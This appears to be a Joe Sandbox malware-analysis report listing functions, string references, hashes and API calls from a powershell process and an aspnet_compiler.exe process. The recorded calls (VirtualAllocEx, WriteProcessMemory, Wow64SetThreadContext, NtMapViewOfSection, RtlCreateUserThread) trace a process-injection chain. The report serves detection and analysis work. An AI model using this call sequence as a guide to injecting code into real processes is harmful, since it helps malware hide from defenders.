$^q, xrefs: 070A0D8F
4'^q, xrefs: 070A0ABF

Memory Dump Source

Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2118039658
Opcode ID: 6a62bdc4de6e76c447df5455d209f4118b3d7bc796947b86a203fddaf800c1db
Instruction ID: b6645478ba60f90cc6b54f4b118683df63274d54351e032a55c2deff40f29b9d
Opcode Fuzzy Hash: 6a62bdc4de6e76c447df5455d209f4118b3d7bc796947b86a203fddaf800c1db
Instruction Fuzzy Hash: A9F17BB1B1430EAFDB648BB888107BABBE5AF85311F14866BD455CB241FF31D845C7A1

Function 070A1FC0 Relevance: 14.4, Strings: 11, Instructions: 611COMMON

Download Yara Rule

Strings

$^q, xrefs: 070A2077
(o^q, xrefs: 070A25CE
(o^q, xrefs: 070A25DE
4'^q, xrefs: 070A225A
4'^q, xrefs: 070A209A
4'^q, xrefs: 070A2266
4'^q, xrefs: 070A2400
4'^q, xrefs: 070A20A6
4'^q, xrefs: 070A240C
$^q, xrefs: 070A205B
$^q, xrefs: 070A2083

Memory Dump Source

Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-1590887
Opcode ID: 083a43d8c3d3643d9cab47717aa134adcfc5fc2137e375351ee3b28a1737206a
Instruction ID: 25cdc1233d135bc925680d8e8d093133ac68c58d0ad7582cbb5071cd2b16a585
Opcode Fuzzy Hash: 083a43d8c3d3643d9cab47717aa134adcfc5fc2137e375351ee3b28a1737206a
Instruction Fuzzy Hash: 641205B1B0421AEFCB548FA8C8147AEBBE2BFC5321F14C67AD5158B251DB31C885CB91

Function 070A1448 Relevance: 12.8, Strings: 10, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 070A1562
$^q, xrefs: 070A1693
$^q, xrefs: 070A14F8
$^q, xrefs: 070A16BB
$^q, xrefs: 070A1504
4'^q, xrefs: 070A16E0
4'^q, xrefs: 070A16D4
4'^q, xrefs: 070A1556
$^q, xrefs: 070A16AF
$^q, xrefs: 070A149F

Memory Dump Source

Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3512890053
Opcode ID: 51dbd49b863137160e6cbd0db65c7684b751a128b9d28f5a6251b5fd1e8a0fd9
Instruction ID: 449d2b3031345e2c9440f2bb6a86f1de6b4b67840ed0cfeeaab769cf3f2a9b08
Opcode Fuzzy Hash: 51dbd49b863137160e6cbd0db65c7684b751a128b9d28f5a6251b5fd1e8a0fd9
Instruction Fuzzy Hash: 72B139B5B0434EEFCF258FB9880077ABBF6AF86211F18856AD855CB241DB31C945C7A1

Function 0420BFE0 Relevance: 6.9, APIs: 4, Instructions: 871memoryprocessthreadCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 0420C41C
VirtualAllocEx.KERNEL32(?,00000001,00000000,?,?), ref: 0420C510

Part of subcall function 042077D8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A24789D,00000000,?,?,?,?,00000000,?,0420C573,?,00000000,?), ref: 0420D464

ResumeThread.KERNELBASE(?), ref: 0420C8BA
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0420CD74

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
String ID:
API String ID: 4270437565-0
Opcode ID: 4a51a12f84cbdb90b370b5b0a52d4e287633afbf5f0f075fbb63aff26f562cda
Instruction ID: c0b7547784d3633852966c344a677f900750ddcdb9a4fbb4e27dea6a9630f50c
Opcode Fuzzy Hash: 4a51a12f84cbdb90b370b5b0a52d4e287633afbf5f0f075fbb63aff26f562cda
Instruction Fuzzy Hash: E38241B0A1021ACFDB28DF65C954B9AB7F1BF44304F14C6A9D45AA7292DB70BD84CF50

Function 070A095B Relevance: 3.9, Strings: 3, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 070A0A36
4'^q, xrefs: 070A0AB3
$^q, xrefs: 070A0A8C

Memory Dump Source

Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: 6d358f0e994cd64b8764777a3136ae2ddea75d2b92fc03b6b4006e2023e9ccee
Instruction ID: f7ef228b7ed4a6a12e2778d7cabb5289d0f69b56ca65ccd0b90de574e2fe11d6
Opcode Fuzzy Hash: 6d358f0e994cd64b8764777a3136ae2ddea75d2b92fc03b6b4006e2023e9ccee
Instruction Fuzzy Hash: FA3135F0A1430EAFEB648EA4D5107BE7BE4AF92314F148266D414CB191FB35C980C7B1

Function 070A142B Relevance: 3.9, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 070A14F8
4'^q, xrefs: 070A1556
$^q, xrefs: 070A149F

Memory Dump Source

Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: 6eaf4a6001a98278180b085ba15b659d5ed135189079b35e31ebd58b9ee99b1c
Instruction ID: 1b1dbd576ae9e7ba50c06ad07cf8f7c5f5e35cdb2c5c728dd543a2483c0192d1
Opcode Fuzzy Hash: 6eaf4a6001a98278180b085ba15b659d5ed135189079b35e31ebd58b9ee99b1c
Instruction Fuzzy Hash: B231C2B5D0430EFFCF658FBDC5402AA7BF5AF42260F1986A6D8158B251E734C944CBA1

Function 0420CFD4 Relevance: 2.1, APIs: 1, Instructions: 582
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A24789D,00000000,?,?,?,?,00000000,?,0420C573,?,00000000,?), ref: 0420D464

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fb35cd707031df407abd32122b99cab08e04194cdc2ad75401b70ad14e375e92
Instruction ID: 8c2e41fa15f2cc30f008cbc5fae51f788dfed13c19bbbe97ac68be88cdde5d2d
Opcode Fuzzy Hash: fb35cd707031df407abd32122b99cab08e04194cdc2ad75401b70ad14e375e92
Instruction Fuzzy Hash: 4D316BB59163499FDB11CFA9C884ADEBFF4FF09310F1584AAE444E7251C338A944CBA5

Function 0420CC24 Relevance: 1.7, APIs: 1, Instructions: 160
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0420CD74

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fb96032dc6888ac7f09861e997b576dfb420efd7bdd7084ce1b711ceebbd3856
Instruction ID: 1123717fed32ea9c36bd99ad75236de46f400d7cf9906f1c8a806b91f2f87608
Opcode Fuzzy Hash: fb96032dc6888ac7f09861e997b576dfb420efd7bdd7084ce1b711ceebbd3856
Instruction Fuzzy Hash: 31513AB1D0121ADFDB24CF59C840BDDBBB5BF48314F1485AAE909B7250D775AA88CF50

Function 042077B4 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0420CD74

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d91978bc342fe9300c28321fcd00ced9fac453d46f0521f53c8fd63425f35550
Instruction ID: 753044ded64d117b12a20ed09865d966554e555f58092d218b46de55046b580c
Opcode Fuzzy Hash: d91978bc342fe9300c28321fcd00ced9fac453d46f0521f53c8fd63425f35550
Instruction Fuzzy Hash: 9F5128B190121ADFDB24CF99C940BDDBBF5BF48314F1085AAE909B7250D775AA88CF50

Function 042077D8 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A24789D,00000000,?,?,?,?,00000000,?,0420C573,?,00000000,?), ref: 0420D464

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 87ca32e6fc80cf7fe5510ce9b61279a95c7fa363a7ffa3d6b9f78a0fce49a291
Instruction ID: e4394aa9ff6306a65413afb1e540329c5053fa372bcf2ae90219cbc7da6831fe
Opcode Fuzzy Hash: 87ca32e6fc80cf7fe5510ce9b61279a95c7fa363a7ffa3d6b9f78a0fce49a291
Instruction Fuzzy Hash: 3521F5B19113099FDB10CF99D884BDEBBF4FB48320F50842AE518A7241D378A944CBA1

Function 042077E4 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0420C24A), ref: 0420CEDB

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ce695e49209c412aa903805391f82b4c00ecdfb97473111ab045bb69c5d3eac4
Instruction ID: e8490f36db65b9465ef22fb1d5efb94eac1e297c3aa4705fe95562d6d6f90592
Opcode Fuzzy Hash: ce695e49209c412aa903805391f82b4c00ecdfb97473111ab045bb69c5d3eac4
Instruction Fuzzy Hash: 2F1123B2A103498FDB14CF9AC844BDFBBF5EB88320F14C12AE418A3241D778A545CFA5

Function 042077C0 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0420C24A), ref: 0420CEDB

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ec19d5fb8c3127540a5cbf503dc70b7f39ed26c69faa4bce633548e761523a0c
Instruction ID: 5ec2c0c91f4abd6b00263aaaf0bed4a0a836300479bd7b2d00929b3203ccd1e5
Opcode Fuzzy Hash: ec19d5fb8c3127540a5cbf503dc70b7f39ed26c69faa4bce633548e761523a0c
Instruction Fuzzy Hash: 411126B19103098FDB14CF9AC844BDFBBF4EB88320F14C129E418A3241D778A545CFA5

Function 0420CE68 Relevance: 1.6, APIs: 1, Instructions: 55
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0420C24A), ref: 0420CEDB

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ddc6fe99daefdd330699dc3d0e65639c347c01a1f2a3f4cb9e189c6648350fd6
Instruction ID: bda0fcd214d1217eb393f080786fd6ff40d1bbf5b37f9471463c535842e6ca82
Opcode Fuzzy Hash: ddc6fe99daefdd330699dc3d0e65639c347c01a1f2a3f4cb9e189c6648350fd6
Instruction Fuzzy Hash: 6D1126B1D102498FDB10CF9AC885BDEBBF4EB88320F54852AD418A3640D738A545CF61

Function 070A18B8 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5563a3120228cff4e655143c45da91e3b4c4c30cbc1bad140abc5ff538c354ba
Instruction ID: c693230d5bd7bbea1cd32bc406b6408405a8ed31453dc80c103f3d33e883550f
Opcode Fuzzy Hash: 5563a3120228cff4e655143c45da91e3b4c4c30cbc1bad140abc5ff538c354ba
Instruction Fuzzy Hash: BC517DB4B00208EFDB14DB98C541BAEBBF2AF99314F948569D5056F391CB72EC41CBA1

Function 070A189F Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0be731c45ffb49762293535e378708d6c5235d9daf99ca8c412d1317c3d58e
Instruction ID: 41c89e8c9451fd5acae5fee5d4ae78ea683b39161070aadbce9d501d6e7c32ea
Opcode Fuzzy Hash: 3b0be731c45ffb49762293535e378708d6c5235d9daf99ca8c412d1317c3d58e
Instruction Fuzzy Hash: 8D516DB4A00205EFD714CB98C541FAEBBF2EF99314F5581A9D9056F392CA72EC41CBA1

Function 040FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1939339032.00000000040FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f7e7b6e62e5b02fe69f9d0f310f3f5e4dd8936da46ed099a49b0db4b26c6659
Instruction ID: 71801413c58e31505f7e7ba768b6237bcca8cee0f2623f3a6022c7ec6b206564
Opcode Fuzzy Hash: 0f7e7b6e62e5b02fe69f9d0f310f3f5e4dd8936da46ed099a49b0db4b26c6659
Instruction Fuzzy Hash: 70012B711043449AE7508F15ECC4B67BFD8DF51325F18C43AEE4A1B682C779A841D7B2

Function 040FD007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1939339032.00000000040FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac00721b2d4f931606f7d132c155a03f193e048e24918dbaf0f4cfc60dc5f6d
Instruction ID: 13da2818b5f1f29ad0cd4290c7e192c4e6d171cc9696116ff3a823b84fc67058
Opcode Fuzzy Hash: 7ac00721b2d4f931606f7d132c155a03f193e048e24918dbaf0f4cfc60dc5f6d
Instruction Fuzzy Hash: 97015E7200E3C09EE7528B259C94B52BFB4DF53224F1D80DBDD899F1A3C2695849C772

Non-executed Functions

Function 0420A768 Relevance: .6, Instructions: 562COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4200000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14cb2f29a25440842d0be62efabe95f5b5ca2387e99c345457746618528c5ba4
Instruction ID: dc54522f80d2f4cc700b07dd39ec77a845790c2957907a3dc358c0bd0330fec1
Opcode Fuzzy Hash: 14cb2f29a25440842d0be62efabe95f5b5ca2387e99c345457746618528c5ba4
Instruction Fuzzy Hash: C222AD71B2530A9FDB11CF98C8806AAB7F1EF65304F91C866D446EB292E370F985CB51

Function 070A06F3 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

$^q, xrefs: 070A073A
4'^q, xrefs: 070A075B
$^q, xrefs: 070A0746
4'^q, xrefs: 070A0767

Memory Dump Source

Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 8ffad8fb7c82346ae92f052a1bcb92565e057cabc10113b4f133fa5964e13e25
Instruction ID: 79752df4a1b9a795a5da724dc3dd6b4961abf8f574abba478880318345ecb8d2
Opcode Fuzzy Hash: 8ffad8fb7c82346ae92f052a1bcb92565e057cabc10113b4f133fa5964e13e25
Instruction Fuzzy Hash: BF012660B093991FC72A06681C256BA6FF24FC3611F1905EBD081DF247DD314C4A83A7

Analysis Process: aspnet_compiler.exePID: 5816, Parent PID: 7948COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	57.1%
Total number of Nodes:	56
Total number of Limit Nodes:	2

Executed Functions

Function 004014D6 Relevance: 10.8, APIs: 7, Instructions: 253
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

Function 004014E8 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

Function 004014EB Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

Function 00402F5D Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403091
NtTerminateProcess.NTDLL ref: 004030AA

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

Function 004030BF Relevance: 3.1, APIs: 2, Instructions: 82
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403091
NtTerminateProcess.NTDLL ref: 004030AA

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

Function 004018C5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Strings

zOji, xrefs: 004018C5

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID: zOji
API String ID: 4152845823-4118548424
Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
